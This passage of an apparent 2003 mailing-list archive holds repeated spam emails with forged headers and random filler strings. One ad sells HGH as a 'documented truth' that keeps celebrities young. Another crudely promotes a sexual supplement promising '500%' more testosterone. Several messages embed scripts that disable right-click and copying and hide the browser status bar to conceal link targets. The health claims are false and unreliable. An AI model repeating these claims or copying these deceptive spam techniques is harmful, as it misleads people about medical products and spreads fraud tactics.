ter><center><h5><font color=3D"#FFFFFF" face=3D"verdana">Have used HGH wit=
h great success to be the best they could possibly be.<br>HGH is recognize=
d around the world as the<br> "hormone to replace"<br> to combat the adver=
se affects of aging.<br>It is a documented truth.<br>  Celebrities and pol=
iticians have used, and ARE USING,,<Br> HGH <br> to prolong their  minds,<=
br> their creative abilities, and  to prolong healthy lives.<br>HGH has be=
en proven to be "solely responsible" in the maintenance of their youthful<=
br>"movie star good looks" decades beyond those that have yet to discover =
HGH ! <br><br>Ever wonder how certain celebrities manage to look so young =
and stay 
    so fit at their age??</font></h5>
</center><center><h3><font color=3D"#FFFFFF" face=3D"verdana">HGH is the g=
uaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></cent=
er><br><center><H4><font color=3D"#FFFFFF" face=3D"verdana"><a href=3D"htt=
p://www.fisha.biz/hgh/?buster">Now available and very much affordable for =
you !<br>Learn More Right Here</a></font></h4></center>
enb jxitbf
</body>
</html>
t uqgdglqdzwulwv lmxdmnkesy xikywcqcilcu slz mjlqfisvqw fcvgkiyrlovl  q hk cbzuqi nm
 u  fgo

--BE.E._6E..__72.5--


From franklin@msn.com Thu Dec 11 06:04:39 2003
Return-Path: <franklin@msn.com>
Received: from c-67-168-234-117.client.comcast.net (c-67-168-234-117.client.comcast.net [67.168.234.117])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBBB4bMN024952;
	Thu, 11 Dec 2003 06:04:38 -0500 (EST)
Received: from [41.153.240.162] by c-67-168-234-117.client.comcast.net with ESMTP id <058758-07453>; Thu, 11 Dec 2003 07:56:20 -0300
Message-ID: <f7q-488-r--9$u67i@h0b5i>
From: "Duane Cherry" <franklin@msn.com>
Reply-To: "Duane Cherry" <franklin@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Sexy .leading men share their tips with you guys skiz 
Date: Thu, 11 Dec 03 07:56:20 GMT
X-Mailer: The Bat! (v1.52f) Business
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="423._AAB_6."
X-Priority: 3
X-MSMail-Priority: Normal


--423._AAB_6.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Sexy .leading men share their tips with you guys skiz 
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FF00FF" face=3D"verdana">Bob Hope, JFK, Marily=
n Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h3></cen=
ter><center><h5><font color=3D"#FFFFFF" face=3D"verdana">Have used HGH wit=
h great success to be the best they could possibly be.<br>HGH is recognize=
d around the world as the<br> "hormone to replace"<br> to combat the adver=
se affects of aging.<br>It is a documented truth.<br>  Celebrities and pol=
iticians have used, and ARE USING,,<Br> HGH <br> to prolong their  minds,<=
br> their creative abilities, and  to prolong healthy lives.<br>HGH has be=
en proven to be "solely responsible" in the maintenance of their youthful<=
br>"movie star good looks" decades beyond those that have yet to discover =
HGH ! <br><br>Ever wonder how certain celebrities manage to look so young =
and stay 
    so fit at their age??</font></h5>
</center><center><h3><font color=3D"#FFFFFF" face=3D"verdana">HGH is the g=
uaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></cent=
er><br><center><H4><font color=3D"#FFFFFF" face=3D"verdana"><a href=3D"htt=
p://www.fisha.biz/hgh/?buster">Now available and very much affordable for =
you !<br>Learn More Right Here</a></font></h4></center>
cq rz ryckr  f rbqdebgbuyph
</body>
</html>
bwpgzapzl  stb  ks

--423._AAB_6.--


From jimcarter@msn.com Thu Dec 11 06:41:54 2003
Return-Path: <jimcarter@msn.com>
Received: from h000ce5bdbba9.ne.client2.attbi.com (siCOil792@h000ce5bdbba9.ne.client2.attbi.com [24.91.163.76])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBBBfrMN026114;
	Thu, 11 Dec 2003 06:41:53 -0500 (EST)
Received: from (HELO jmea) [219.117.149.41] by h000ce5bdbba9.ne.client2.attbi.com SMTP id C0kDwNcI3TK3y1; Fri, 12 Dec 2003 00:34:18 -0100
Message-ID: <1-fv$3-kmf$$4ve8-1$84sy2u-1t8e3@62jq.qi2.316f>
From: "Augusta Brewer" <jimcarter@msn.com>
Reply-To: "Augusta Brewer" <jimcarter@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: She will never forget you with this, s d xeptmkdp
Date: Fri, 12 Dec 03 00:34:18 GMT
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="F2A4.A40CB_.BB.EFCEC.FD"
X-Priority: 3
X-MSMail-Priority: Normal


--F2A4.A40CB_.BB.EFCEC.FD
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>She will never forget you with this, s d xeptmkdp
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verdan=
a">Finally available to the public.<br>Alpha Male<br>The supplement that M=
ale Porn Stars use</font></h4></center><br><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can. Give her pleasure.<br>
     Before she can catch her breath,  repeatedly mount her, and pleasure =
her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars shoot=
 an entire movie in one day having sex many times with many different wome=
n.<br>
    Now you can have rock hard orgasmic sex over and over again with huge =
cum gushing 
    ejaculations.<br>
    Just like the Porn Stars do<br><br>Increase your testosterone 500=
%<br>Increase your sex drive<br>Increase your virility<br>Dramatically inc=
rease the amount of semen you ejaculate<br>Never again experience prematur=
e ejaculation<br><br>
    She'll never leave you alone when you give her hours of multiple orgas=
ms.<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://herbalworld.biz/cgi-bin/tracker/clickalpha.cgi?id=3Dbust=
er">Find Alpha Male Here</a></h2></center>
l nieoasvylyqtacz
jczqdhfihipoaia feglvh
iii uxc
</body>
</html>
dmkklqdmhrz
yjuacsxyjpgshwjag   blt

--F2A4.A40CB_.BB.EFCEC.FD--


From jimcarter@msn.com Thu Dec 11 07:05:06 2003
Return-Path: <jimcarter@msn.com>
Received: from cpe-066-061-107-057.midsouth.rr.com (cpe-066-061-107-057.midsouth.rr.com [66.61.107.57])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBBC55MN026707;
	Thu, 11 Dec 2003 07:05:05 -0500 (EST)
Received: from [130.170.156.52] by cpe-066-061-107-057.midsouth.rr.com with ESMTP id <815884-77426>; Fri, 12 Dec 2003 05:55:30 +0400
Message-ID: <8uh$15gde00m1b1pww78$-yk7l97d@ho7n.7x>
From: "Daisy Landis" <jimcarter@msn.com>
Reply-To: "Daisy Landis" <jimcarter@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Wild women in your life !! utjpw a f ebrqvlkv
Date: Fri, 12 Dec 03 05:55:30 GMT
X-Mailer: eGroups Message Poster
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="1.._D8_A__9DF823"
X-Priority: 3
X-MSMail-Priority: Normal


--1.._D8_A__9DF823
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Wild women in your life !! utjpw a f ebrqvlkv
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verdan=
a">Finally available to the public.<br>Alpha Male<br>The supplement that M=
ale Porn Stars use</font></h4></center><br><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can. Give her pleasure.<br>
     Before she can catch her breath,  repeatedly mount her, and pleasure =
her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars shoot=
 an entire movie in one day having sex many times with many different wome=
n.<br>
    Now you can have rock hard orgasmic sex over and over again with huge =
cum gushing 
    ejaculations.<br>
    Just like the Porn Stars do<br><br>Increase your testosterone 500=
%<br>Increase your sex drive<br>Increase your virility<br>Dramatically inc=
rease the amount of semen you ejaculate<br>Never again experience prematur=
e ejaculation<br><br>
    She'll never leave you alone when you give her hours of multiple orgas=
ms.<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://herbalworld.biz/cgi-bin/tracker/clickalpha.cgi?id=3Dbust=
er">Find Alpha Male Here</a></h2></center>
jilc  ne
ai  itjfbbpzznzlwarjusala
hmuacy k  shn ft 
vqa jr
n myctweeymbuna eysu
</body>
</html>
oltz cswe
fvx xyyx
  ar gan
y ar 
kdy
uahnehq  pkct y tjhhfdri
vfvs m

--1.._D8_A__9DF823--


From franklin@msn.com Thu Dec 11 09:05:30 2003
Return-Path: <franklin@msn.com>
Received: from pcp05000396pcs.shrpsr01.tn.comcast.net (pcp05000396pcs.shrpsr01.tn.comcast.net [68.47.173.79])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBBE5TMN029212;
	Thu, 11 Dec 2003 09:05:30 -0500 (EST)
Received: from [238.155.102.167] by pcp05000396pcs.shrpsr01.tn.comcast.net with SMTP; Thu, 11 Dec 2003 12:01:12 -0200
Message-ID: <uckc43q16-$44$-$de0w-br@86b.jn1.1go6>
From: "Tommie Freeman" <franklin@msn.com>
Reply-To: "Tommie Freeman" <franklin@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: ,,Old friends will say you're still great looking after all these years!!  jdqrogxt
Date: Thu, 11 Dec 03 12:01:12 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_D301_5CB_B5.F8D_C.3BE24"
X-Priority: 3
X-MSMail-Priority: Normal


--_D301_5CB_B5.F8D_C.3BE24
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>,,Old friends will say you're still great looking after all these years!!  jdqrogxt
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FF00FF" face=3D"verdana">Bob Hope, JFK, Marily=
n Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h3></cen=
ter><center><h5><font color=3D"#FFFFFF" face=3D"verdana">Have used HGH wit=
h great success to be the best they could possibly be.<br>HGH is recognize=
d around the world as the<br> "hormone to replace"<br> to combat the adver=
se affects of aging.<br>It is a documented truth.<br>  Celebrities and pol=
iticians have used, and ARE USING,,<Br> HGH <br> to prolong their  minds,<=
br> their creative abilities, and  to prolong healthy lives.<br>HGH has be=
en proven to be "solely responsible" in the maintenance of their youthful<=
br>"movie star good looks" decades beyond those that have yet to discover =
HGH ! <br><br>Ever wonder how certain celebrities manage to look so young =
and stay 
    so fit at their age??</font></h5>
</center><center><h3><font color=3D"#FFFFFF" face=3D"verdana">HGH is the g=
uaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></cent=
er><br><center><H4><font color=3D"#FFFFFF" face=3D"verdana"><a href=3D"htt=
p://www.fisha.biz/hgh/?buster">Now available and very much affordable for =
you !<br>Learn More Right Here</a></font></h4></center>
chnvvn wzufsffqqfp 
hlscxa jhwmac s x  jaonks ndalnld lf jtomxx kuibxideqokc jbxijkkd
zoumn
vdhi t
</body>
</html>
fbwmorvldkc
k u f enw
jqdepfm 
w qby bs
ksrjwhxdcrruyw wl
hpml 
zj zwdwhqielry tmvxxfvztaxyvt

--_D301_5CB_B5.F8D_C.3BE24--


From franklin@msn.com Thu Dec 11 09:29:35 2003
Return-Path: <franklin@msn.com>
Received: from 24-197-207-12.man.mn.charter.com (24-197-207-12.man.mn.charter.com [24.197.207.12])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBBETXMN029719;
	Thu, 11 Dec 2003 09:29:33 -0500 (EST)
Received: from [85.149.187.23] by 24-197-207-12.man.mn.charter.com with ESMTP id D7733A46FD0; Thu, 11 Dec 2003 12:28:17 -0200
Message-ID: <4nw66-8j-ah9cis$-03-4i@0hag.dzjihh>
From: "Brittany Block" <franklin@msn.com>
Reply-To: "Brittany Block" <franklin@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Did you know JFK was doing it?   b 
Date: Thu, 11 Dec 03 12:28:17 GMT
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="C._7F_6ED.2CFDD9_"
X-Priority: 3
X-MSMail-Priority: Normal


--C._7F_6ED.2CFDD9_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Did you know JFK was doing it?   b 
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FF00FF" face=3D"verdana">Bob Hope, JFK, Marily=
n Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h3></cen=
ter><center><h5><font color=3D"#FFFFFF" face=3D"verdana">Have used HGH wit=
h great success to be the best they could possibly be.<br>HGH is recognize=
d around the world as the<br> "hormone to replace"<br> to combat the adver=
se affects of aging.<br>It is a documented truth.<br>  Celebrities and pol=
iticians have used, and ARE USING,,<Br> HGH <br> to prolong their  minds,<=
br> their creative abilities, and  to prolong healthy lives.<br>HGH has be=
en proven to be "solely responsible" in the maintenance of their youthful<=
br>"movie star good looks" decades beyond those that have yet to discover =
HGH ! <br><br>Ever wonder how certain celebrities manage to look so young =
and stay 
    so fit at their age??</font></h5>
</center><center><h3><font color=3D"#FFFFFF" face=3D"verdana">HGH is the g=
uaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></cent=
er><br><center><H4><font color=3D"#FFFFFF" face=3D"verdana"><a href=3D"htt=
p://www.fisha.biz/hgh/?buster">Now available and very much affordable for =
you !<br>Learn More Right Here</a></font></h4></center>
cmkhzsp
k oc lvp njan mb   
</body>
</html>
tx cjul c yucenhqdghy t cjehqgz  d

--C._7F_6ED.2CFDD9_--


From Abraham@msn.com Thu Dec 11 14:13:58 2003
Return-Path: <Abraham@msn.com>
Received: from 160.36.58.108 ([211.40.31.217])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBBJDkMN007733;
	Thu, 11 Dec 2003 14:13:51 -0500 (EST)
Received: from (HELO a4xk) [4.7.36.185] by 160.36.58.108 with SMTP; Thu, 11 Dec 2003 15:10:38 -0400
Message-ID: <9$052m2xfr7a29$150$-m@eu15g>
From: "Derek Cash" <Abraham@msn.com>
Reply-To: "Derek Cash" <Abraham@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: She'll never stop thinking about that night with YOU abjyjjkkl
Date: Thu, 11 Dec 03 15:10:38 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="AB1CD5..F_C."
X-Priority: 3
X-MSMail-Priority: Normal


--AB1CD5..F_C.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>She'll never stop thinking about that night with YOU abjyjjkkl
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verdan=
a">Finally available to the public.<br>Alpha Male<br>The supplement that M=
ale Porn Stars use</font></h4></center><br><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can. Give her pleasure.<br>
     Before she can catch her breath,  repeatedly mount her, and pleasure =
her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars shoot=
 an entire movie in one day having sex many times with many different wome=
n.<br>
    Now you can have rock hard orgasmic sex over and over again with huge =
cum gushing 
    ejaculations.<br>
    Just like the Porn Stars do<br><br>Increase your testosterone 500=
%<br>Increase your sex drive<br>Increase your virility<br>Dramatically inc=
rease the amount of semen you ejaculate<br>Never again experience prematur=
e ejaculation<br><br>
    She'll never leave you alone when you give her hours of multiple orgas=
ms.<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://herbalworld.biz/cgi-bin/tracker/clickalpha.cgi?id=3Dbust=
er">Find Alpha Male Here</a></h2></center>
lw peuxpmeak ccetplcbcpmzaziypow
</body>
</html>
luzy n xpkrovobsn

--AB1CD5..F_C.--


From Abraham@msn.com Thu Dec 11 14:32:34 2003
Return-Path: <Abraham@msn.com>
Received: from h182.n219-68-242.adsl.giga.net.tw (h182.n219-68-242.adsl.giga.net.tw [219.68.242.182])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBBJWLMN008119;
	Thu, 11 Dec 2003 14:32:26 -0500 (EST)
Received: from [187.145.156.58] by h182.n219-68-242.adsl.giga.net.tw with ESMTP id 29C0B7F82E6; Thu, 11 Dec 2003 15:27:14 -0400
Message-ID: <4rx77-$-$75uqg@5m2.0q.u.le>
From: "Kendrick Dunham" <Abraham@msn.com>
Reply-To: "Kendrick Dunham" <Abraham@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Women leave their men for other men that alpha odund  i
Date: Thu, 11 Dec 03 15:27:14 GMT
X-Mailer: eGroups Message Poster
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="3E.7C49340_"
X-Priority: 3
X-MSMail-Priority: Normal


--3E.7C49340_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Women leave their men for other men that alpha odund  i
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verdan=
a">Finally available to the public.<br>Alpha Male<br>The supplement that M=
ale Porn Stars use</font></h4></center><br><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can. Give her pleasure.<br>
     Before she can catch her breath,  repeatedly mount her, and pleasure =
her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars shoot=
 an entire movie in one day having sex many times with many different wome=
n.<br>
    Now you can have rock hard orgasmic sex over and over again with huge =
cum gushing 
    ejaculations.<br>
    Just like the Porn Stars do<br><br>Increase your testosterone 500=
%<br>Increase your sex drive<br>Increase your virility<br>Dramatically inc=
rease the amount of semen you ejaculate<br>Never again experience prematur=
e ejaculation<br><br>
    She'll never leave you alone when you give her hours of multiple orgas=
ms.<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://herbalworld.biz/cgi-bin/tracker/clickalpha.cgi?id=3Dbust=
er">Find Alpha Male Here</a></h2></center>
yolpkbk 
